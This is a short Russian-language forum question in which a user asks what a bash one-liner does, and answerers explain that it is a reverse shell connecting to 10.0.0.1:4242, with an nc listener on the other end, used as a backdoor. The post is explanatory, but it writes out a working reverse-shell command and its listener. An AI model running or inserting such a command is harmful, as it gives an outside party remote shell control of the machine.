# Что делает данный bash скрипт?

Tags: bash

Подскажите пожалуйста, что делает данный bash скрипт?

```
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
```

На сколько я понял, скрипт вписывает 0 в файл 4242 в фоновом режиме??? А дальше выполняет 1?

Comment: man bash раздел про перенаправления

Comment: Насколько я понимаю, ввод с клавиатуры будет отправлен по сети на 10.0.0.1:4242

Answer (score 5, accepted):

Нет, это скрипт для обратного соединения. На хосте 10.0.0.1 в терминале например команда nc -lvnp 4242, чтобы слушать порт, а у вас на компьютере эта команда, в итоге устанавливается подключение к вашему компьютеру с хоста 10.0.0.1

Comment: Я правильно понимаю, что это бекдор?

Comment: Да, используется как бэкдор.